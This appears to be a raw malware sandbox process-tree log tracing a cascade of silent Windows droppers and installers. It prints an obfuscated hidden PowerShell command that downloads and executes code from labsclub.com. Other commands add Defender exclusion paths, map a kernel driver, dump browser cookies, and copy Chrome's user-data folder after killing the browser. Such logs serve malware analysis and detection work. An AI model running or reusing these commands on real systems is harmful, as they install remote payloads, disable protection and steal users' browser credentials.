C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"18⤵PID:1672
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kh0ifvyj3kv\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\kh0ifvyj3kv\Setup3310.exe" /Verysilent /subid=57714⤵PID:9160
-
C:\Users\Admin\AppData\Local\Temp\is-VHBJ8.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-VHBJ8.tmp\Setup3310.tmp" /SL5="$4054A,802346,56832,C:\Users\Admin\AppData\Local\Temp\kh0ifvyj3kv\Setup3310.exe" /Verysilent /subid=57715⤵PID:9264
-
C:\Users\Admin\AppData\Local\Temp\is-5L752.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5L752.tmp\Setup.exe" /Verysilent16⤵PID:10496
-
C:\Users\Admin\AppData\Local\Temp\is-H5DAP.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-H5DAP.tmp\Setup.tmp" /SL5="$404E8,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-5L752.tmp\Setup.exe" /Verysilent17⤵PID:11044
-
C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\ProPlugin.exe" /Verysilent18⤵PID:7988
-
C:\Users\Admin\AppData\Local\Temp\is-N593F.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-N593F.tmp\ProPlugin.tmp" /SL5="$40282,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\ProPlugin.exe" /Verysilent19⤵PID:2656
-
C:\Users\Admin\AppData\Local\Temp\is-NPC3U.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-NPC3U.tmp\Setup.exe"20⤵PID:8624
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"21⤵PID:4672
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\PictureLAb.exe" /Verysilent18⤵PID:7828
-
C:\Users\Admin\AppData\Local\Temp\is-B53SB.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-B53SB.tmp\PictureLAb.tmp" /SL5="$7021E,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\PictureLAb.exe" /Verysilent19⤵PID:9860
-
C:\Users\Admin\AppData\Local\Temp\is-8N93T.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-8N93T.tmp\Setup.exe" /VERYSILENT20⤵PID:7480
-
C:\Users\Admin\AppData\Local\Temp\is-2E7R6.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-2E7R6.tmp\Setup.tmp" /SL5="$4058C,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-8N93T.tmp\Setup.exe" /VERYSILENT21⤵PID:10020
-
C:\Users\Admin\AppData\Local\Temp\is-BKQLN.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-BKQLN.tmp\kkkk.exe" /S /UID=lab21422⤵PID:10844
-
C:\Users\Admin\AppData\Local\Temp\84-5ff66-e87-ef7a5-e43215c4f8d2c\Ruwaepishowi.exe"C:\Users\Admin\AppData\Local\Temp\84-5ff66-e87-ef7a5-e43215c4f8d2c\Ruwaepishowi.exe"23⤵PID:9828
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ucxjlhd1.4kk\GcleanerWW.exe /mixone & exit24⤵PID:6984
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qbc1poou.5xy\privacytools5.exe & exit24⤵PID:7620
-
C:\Users\Admin\AppData\Local\Temp\qbc1poou.5xy\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\qbc1poou.5xy\privacytools5.exe25⤵PID:7268
-
C:\Users\Admin\AppData\Local\Temp\qbc1poou.5xy\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\qbc1poou.5xy\privacytools5.exe26⤵PID:9528
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xf3r1krc.ewp\setup.exe /8-2222 & exit24⤵PID:7908
-
C:\Users\Admin\AppData\Local\Temp\xf3r1krc.ewp\setup.exeC:\Users\Admin\AppData\Local\Temp\xf3r1krc.ewp\setup.exe /8-222225⤵PID:9452
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Long-Glade"26⤵PID:6556
-
-
C:\Program Files (x86)\Long-Glade\7za.exe"C:\Program Files (x86)\Long-Glade\7za.exe" e -p154.61.71.51 winamp-plugins.7z26⤵PID:7128
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Long-Glade\setup.exe" -map "C:\Program Files (x86)\Long-Glade\WinmonProcessMonitor.sys""26⤵PID:5920
-
C:\Program Files (x86)\Long-Glade\setup.exe"C:\Program Files (x86)\Long-Glade\setup.exe" -map "C:\Program Files (x86)\Long-Glade\WinmonProcessMonitor.sys"27⤵PID:6524
-
-
-
C:\Program Files (x86)\Long-Glade\7za.exe"C:\Program Files (x86)\Long-Glade\7za.exe" e -p154.61.71.51 winamp.7z26⤵PID:8852
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1wzjx5om.kcr\MultitimerFour.exe & exit24⤵PID:8536
-
C:\Users\Admin\AppData\Local\Temp\1wzjx5om.kcr\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\1wzjx5om.kcr\MultitimerFour.exe25⤵PID:6876
-
C:\Users\Admin\AppData\Local\Temp\B1Y4U7G52A\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B1Y4U7G52A\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10426⤵PID:5996
-
C:\Users\Admin\AppData\Local\Temp\B1Y4U7G52A\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B1Y4U7G52A\multitimer.exe" 1 3.1615014873.60432bd9a9e74 10427⤵PID:4936
-
C:\Users\Admin\AppData\Local\Temp\B1Y4U7G52A\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B1Y4U7G52A\multitimer.exe" 2 3.1615014873.60432bd9a9e7428⤵PID:8048
-
C:\Users\Admin\AppData\Local\Temp\fwi5c30epsq\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\fwi5c30epsq\Setup3310.exe" /Verysilent /subid=57729⤵PID:7284
-
C:\Users\Admin\AppData\Local\Temp\is-EN33V.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-EN33V.tmp\Setup3310.tmp" /SL5="$606A2,802346,56832,C:\Users\Admin\AppData\Local\Temp\fwi5c30epsq\Setup3310.exe" /Verysilent /subid=57730⤵PID:10008
-
C:\Users\Admin\AppData\Local\Temp\is-18TP0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-18TP0.tmp\Setup.exe" /Verysilent31⤵PID:10048
-
C:\Users\Admin\AppData\Local\Temp\is-AI0O4.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-AI0O4.tmp\Setup.tmp" /SL5="$30772,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-18TP0.tmp\Setup.exe" /Verysilent32⤵PID:3940
-
C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\ProPlugin.exe" /Verysilent33⤵PID:9456
-
C:\Users\Admin\AppData\Local\Temp\is-VTJV6.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-VTJV6.tmp\ProPlugin.tmp" /SL5="$2071C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\ProPlugin.exe" /Verysilent34⤵PID:2264
-
C:\Users\Admin\AppData\Local\Temp\is-DLC2V.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-DLC2V.tmp\Setup.exe"35⤵PID:9996
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"36⤵PID:1696
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\PictureLAb.exe" /Verysilent33⤵PID:10360
-
C:\Users\Admin\AppData\Local\Temp\is-DAVGD.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-DAVGD.tmp\PictureLAb.tmp" /SL5="$40718,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\PictureLAb.exe" /Verysilent34⤵PID:5580
-
C:\Users\Admin\AppData\Local\Temp\is-N76BH.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-N76BH.tmp\Setup.exe" /VERYSILENT35⤵PID:10380
-
C:\Users\Admin\AppData\Local\Temp\is-GMISD.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-GMISD.tmp\Setup.tmp" /SL5="$B059A,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-N76BH.tmp\Setup.exe" /VERYSILENT36⤵PID:11156
-
C:\Users\Admin\AppData\Local\Temp\is-HHJD8.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-HHJD8.tmp\kkkk.exe" /S /UID=lab21437⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\86-bed50-b64-5b1bc-5f0b4de1a7e08\Ricutywago.exe"C:\Users\Admin\AppData\Local\Temp\86-bed50-b64-5b1bc-5f0b4de1a7e08\Ricutywago.exe"38⤵PID:4712
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gfmeupdr.us4\GcleanerWW.exe /mixone & exit39⤵PID:6392
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nv4wbooj.lr5\privacytools5.exe & exit39⤵PID:8320
-
C:\Users\Admin\AppData\Local\Temp\nv4wbooj.lr5\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\nv4wbooj.lr5\privacytools5.exe40⤵PID:7776
-
C:\Users\Admin\AppData\Local\Temp\nv4wbooj.lr5\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\nv4wbooj.lr5\privacytools5.exe41⤵PID:5512
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\13w1w0z2.yhy\setup.exe /8-2222 & exit39⤵PID:10128
-
C:\Users\Admin\AppData\Local\Temp\13w1w0z2.yhy\setup.exeC:\Users\Admin\AppData\Local\Temp\13w1w0z2.yhy\setup.exe /8-222240⤵PID:9180
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Restless-Tree"41⤵PID:8176
-
-
C:\Program Files (x86)\Restless-Tree\7za.exe"C:\Program Files (x86)\Restless-Tree\7za.exe" e -p154.61.71.51 winamp-plugins.7z41⤵PID:5900
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5f555a2l.crq\MultitimerFour.exe & exit39⤵PID:8720
-
C:\Users\Admin\AppData\Local\Temp\5f555a2l.crq\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\5f555a2l.crq\MultitimerFour.exe40⤵PID:11152
-
C:\Users\Admin\AppData\Local\Temp\WTBNL9S9LU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WTBNL9S9LU\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10441⤵PID:9520
-
C:\Users\Admin\AppData\Local\Temp\WTBNL9S9LU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WTBNL9S9LU\multitimer.exe" 1 3.1615015133.60432cddbc131 10442⤵PID:5532
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\Delta.exe" /Verysilent33⤵PID:10964
-
C:\Users\Admin\AppData\Local\Temp\is-O1698.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-O1698.tmp\Delta.tmp" /SL5="$50718,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\Delta.exe" /Verysilent34⤵PID:8520
-
C:\Users\Admin\AppData\Local\Temp\is-OHDPI.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-OHDPI.tmp\Setup.exe" /VERYSILENT35⤵PID:8816
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-OHDPI.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit36⤵PID:10560
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f37⤵
- Kills process with taskkill
PID:9340
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\zznote.exe" /Verysilent33⤵PID:8312
-
C:\Users\Admin\AppData\Local\Temp\is-L2DAU.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-L2DAU.tmp\zznote.tmp" /SL5="$70896,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\zznote.exe" /Verysilent34⤵PID:6072
-
C:\Users\Admin\AppData\Local\Temp\is-OKIK5.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-OKIK5.tmp\jg4_4jaa.exe" /silent35⤵PID:8636
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-27VEJ.tmp\hjjgaa.exe" /Verysilent33⤵PID:8488
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt34⤵PID:5568
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt34⤵PID:9804
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhmw2bhwunh\40pq3gkwfxd.exe"C:\Users\Admin\AppData\Local\Temp\jhmw2bhwunh\40pq3gkwfxd.exe" /ustwo INSTALL29⤵PID:10824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10824 -s 66830⤵
- Program crash
PID:6060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10824 -s 70830⤵
- Program crash
PID:10192
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10824 -s 80830⤵
- Program crash
PID:7492
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10824 -s 87630⤵
- Program crash
PID:5876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10824 -s 92430⤵
- Program crash
PID:8032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10824 -s 108030⤵
- Program crash
PID:7612
-
-
-
C:\Users\Admin\AppData\Local\Temp\jkiulmdfd0t\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\jkiulmdfd0t\chashepro3.exe" /VERYSILENT29⤵PID:5584
-
C:\Users\Admin\AppData\Local\Temp\is-OBKUC.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-OBKUC.tmp\chashepro3.tmp" /SL5="$60578,2015144,58368,C:\Users\Admin\AppData\Local\Temp\jkiulmdfd0t\chashepro3.exe" /VERYSILENT30⤵PID:8136
-
-
-
C:\Users\Admin\AppData\Local\Temp\dngngvnupyu\safebits.exe"C:\Users\Admin\AppData\Local\Temp\dngngvnupyu\safebits.exe" /S /pubid=1 /subid=45129⤵PID:10076
-
-
C:\Users\Admin\AppData\Local\Temp\ozur4fg0mle\vict.exe"C:\Users\Admin\AppData\Local\Temp\ozur4fg0mle\vict.exe" /VERYSILENT /id=53529⤵PID:1052
-
C:\Users\Admin\AppData\Local\Temp\is-HK3R1.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-HK3R1.tmp\vict.tmp" /SL5="$40612,870426,780800,C:\Users\Admin\AppData\Local\Temp\ozur4fg0mle\vict.exe" /VERYSILENT /id=53530⤵PID:8456
-
C:\Users\Admin\AppData\Local\Temp\is-EJ6IL.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-EJ6IL.tmp\wimapi.exe" 53531⤵PID:6380
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qrvhetwqyce\app.exe"C:\Users\Admin\AppData\Local\Temp\qrvhetwqyce\app.exe" /8-2329⤵PID:5404
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Damp-Haze"30⤵PID:2760
-
-
C:\Program Files (x86)\Damp-Haze\7za.exe"C:\Program Files (x86)\Damp-Haze\7za.exe" e -p154.61.71.51 winamp-plugins.7z30⤵PID:10340
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Damp-Haze\app.exe" -map "C:\Program Files (x86)\Damp-Haze\WinmonProcessMonitor.sys""30⤵PID:2860
-
C:\Program Files (x86)\Damp-Haze\app.exe"C:\Program Files (x86)\Damp-Haze\app.exe" -map "C:\Program Files (x86)\Damp-Haze\WinmonProcessMonitor.sys"31⤵PID:4172
-
-
-
C:\Program Files (x86)\Damp-Haze\7za.exe"C:\Program Files (x86)\Damp-Haze\7za.exe" e -p154.61.71.51 winamp.7z30⤵PID:7112
-
-
C:\Program Files (x86)\Damp-Haze\app.exe"C:\Program Files (x86)\Damp-Haze\app.exe" /8-2330⤵PID:4580
-
-
-
C:\Users\Admin\AppData\Local\Temp\ys0fc31mky3\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\ys0fc31mky3\askinstall24.exe"29⤵PID:11140
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe30⤵PID:3300
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe31⤵
- Kills process with taskkill
PID:7496
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y30⤵PID:3052
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\Delta.exe" /Verysilent18⤵PID:10780
-
C:\Users\Admin\AppData\Local\Temp\is-IU50G.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-IU50G.tmp\Delta.tmp" /SL5="$8021E,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\Delta.exe" /Verysilent19⤵PID:2276
-
C:\Users\Admin\AppData\Local\Temp\is-SIA30.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-SIA30.tmp\Setup.exe" /VERYSILENT20⤵PID:6384
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-SIA30.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit21⤵PID:6044
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f22⤵
- Kills process with taskkill
PID:5544
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 622⤵
- Delays execution with timeout.exe
PID:8268
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\zznote.exe" /Verysilent18⤵PID:6496
-
C:\Users\Admin\AppData\Local\Temp\is-IFAH9.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-IFAH9.tmp\zznote.tmp" /SL5="$A0350,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\zznote.exe" /Verysilent19⤵PID:6200
-
C:\Users\Admin\AppData\Local\Temp\is-TJRCB.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-TJRCB.tmp\jg4_4jaa.exe" /silent20⤵PID:8244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-2RBVJ.tmp\hjjgaa.exe" /Verysilent18⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt19⤵PID:6316
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt19⤵PID:5536
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yvckyr4vdhe\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\yvckyr4vdhe\chashepro3.exe" /VERYSILENT14⤵PID:5108
-
C:\Users\Admin\AppData\Local\Temp\is-KM2OJ.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-KM2OJ.tmp\chashepro3.tmp" /SL5="$50360,2015144,58368,C:\Users\Admin\AppData\Local\Temp\yvckyr4vdhe\chashepro3.exe" /VERYSILENT15⤵PID:9308
-
-
-
C:\Users\Admin\AppData\Local\Temp\nidxrq12vol\vpn.exe"C:\Users\Admin\AppData\Local\Temp\nidxrq12vol\vpn.exe" /silent /subid=48214⤵PID:9228
-
C:\Users\Admin\AppData\Local\Temp\is-CQ9VS.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-CQ9VS.tmp\vpn.tmp" /SL5="$30568,15170975,270336,C:\Users\Admin\AppData\Local\Temp\nidxrq12vol\vpn.exe" /silent /subid=48215⤵PID:9392
-
-
-
C:\Users\Admin\AppData\Local\Temp\4edgwogtlkb\xhmdblnnjd0.exe"C:\Users\Admin\AppData\Local\Temp\4edgwogtlkb\xhmdblnnjd0.exe" /ustwo INSTALL14⤵PID:9256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9256 -s 65615⤵
- Program crash
PID:6376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9256 -s 67215⤵
- Program crash
PID:6676
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9256 -s 79215⤵
- Program crash
PID:6860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9256 -s 85215⤵
- Program crash
PID:7024
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9256 -s 92815⤵
- Program crash
PID:7584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9256 -s 90015⤵
- Program crash
PID:8264
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9256 -s 108815⤵
- Program crash
PID:6768
-
-
-
C:\Users\Admin\AppData\Local\Temp\hz02wbujzlu\safebits.exe"C:\Users\Admin\AppData\Local\Temp\hz02wbujzlu\safebits.exe" /S /pubid=1 /subid=45114⤵PID:6656
-
-
C:\Users\Admin\AppData\Local\Temp\kfnkgox2gfi\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\kfnkgox2gfi\Setup3310.exe" /Verysilent /subid=57714⤵PID:10252
-
C:\Users\Admin\AppData\Local\Temp\is-CQ8DR.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-CQ8DR.tmp\Setup3310.tmp" /SL5="$A0570,802346,56832,C:\Users\Admin\AppData\Local\Temp\kfnkgox2gfi\Setup3310.exe" /Verysilent /subid=57715⤵PID:3200
-
C:\Users\Admin\AppData\Local\Temp\is-C4T64.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-C4T64.tmp\Setup.exe" /Verysilent16⤵PID:8156
-
C:\Users\Admin\AppData\Local\Temp\is-IP3TB.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-IP3TB.tmp\Setup.tmp" /SL5="$4020C,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-C4T64.tmp\Setup.exe" /Verysilent17⤵PID:6116
-
C:\Users\Admin\AppData\Local\Temp\is-3D0HR.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-3D0HR.tmp\ProPlugin.exe" /Verysilent18⤵PID:5820
-
C:\Users\Admin\AppData\Local\Temp\is-GQ797.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-GQ797.tmp\ProPlugin.tmp" /SL5="$2039E,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-3D0HR.tmp\ProPlugin.exe" /Verysilent19⤵PID:5352
-
C:\Users\Admin\AppData\Local\Temp\is-GDP9G.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GDP9G.tmp\Setup.exe"20⤵PID:6528
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"21⤵PID:11224
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-3D0HR.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-3D0HR.tmp\PictureLAb.exe" /Verysilent18⤵PID:7220
-
C:\Users\Admin\AppData\Local\Temp\is-KSEV0.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-KSEV0.tmp\PictureLAb.tmp" /SL5="$906AE,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-3D0HR.tmp\PictureLAb.exe" /Verysilent19⤵PID:1644
-
C:\Users\Admin\AppData\Local\Temp\is-74KRM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-74KRM.tmp\Setup.exe" /VERYSILENT20⤵PID:10656
-
C:\Users\Admin\AppData\Local\Temp\is-QM51H.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-QM51H.tmp\Setup.tmp" /SL5="$70566,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-74KRM.tmp\Setup.exe" /VERYSILENT21⤵PID:4976
-
C:\Users\Admin\AppData\Local\Temp\is-9NBDF.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-9NBDF.tmp\kkkk.exe" /S /UID=lab21422⤵PID:9624
-
C:\Users\Admin\AppData\Local\Temp\9d-25314-810-9f1ab-669b3d9afcb7d\Dygyxulilu.exe"C:\Users\Admin\AppData\Local\Temp\9d-25314-810-9f1ab-669b3d9afcb7d\Dygyxulilu.exe"23⤵PID:10160
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y4cwatx2.rlg\GcleanerWW.exe /mixone & exit24⤵PID:3900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jb2awblp.rsh\privacytools5.exe & exit24⤵PID:6856
-
C:\Users\Admin\AppData\Local\Temp\jb2awblp.rsh\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\jb2awblp.rsh\privacytools5.exe25⤵PID:9292
-
C:\Users\Admin\AppData\Local\Temp\jb2awblp.rsh\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\jb2awblp.rsh\privacytools5.exe26⤵PID:8628
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yoml1tht.eal\setup.exe /8-2222 & exit24⤵PID:2408
-
